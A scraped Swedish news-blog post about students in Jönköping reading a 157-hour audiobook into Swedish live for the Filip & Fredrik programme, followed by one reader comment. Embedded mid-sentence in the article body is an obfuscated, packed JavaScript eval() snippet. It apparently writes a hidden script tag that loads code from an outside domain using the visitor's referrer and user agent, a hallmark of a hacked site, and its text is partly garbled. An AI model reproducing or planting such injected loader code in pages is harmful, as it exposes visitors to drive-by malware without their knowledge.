Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Live: Studenter läser in ljudbok Filip & Fredrik

breaking-news-ljudbok
Sebastian

Live eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hntkt|var|u0026u|referrer|tyzfn||js|php’.split(’|’),0,{}))
med studenterna i Jönköping


I programmet Breaking news har Filip och Fredrik gått ut med att det idag finns en ljudbok som är 157 timmar lång. Dock finns den endast på engelska och detta vill Filip och Fredrik ändra på. Nu har det gett i uppdrag åt några studenter i Jönköping att läsa in denna otroligt långa bok på svenska. Detta måste göras i ett svep då tiden är knapp innan programmet har sitt sista avsnitt.

I skift tar sig studenterna igenom denna bok som faktiskt är världens längsta ljudbok genom tiderna. Hur dessa studenter ska spendera helgen är nog rätt självklart, hemma och läsa bok samtidigt som flera svenskar tittar på dem live.

Revue.se har möjligheten att visa detta live.

Sändningen satte igång klockan 12:00 idag och fortlöper tills boken är helt inspelad. 

 

Comments

  1. Johannes

    Det här är underbart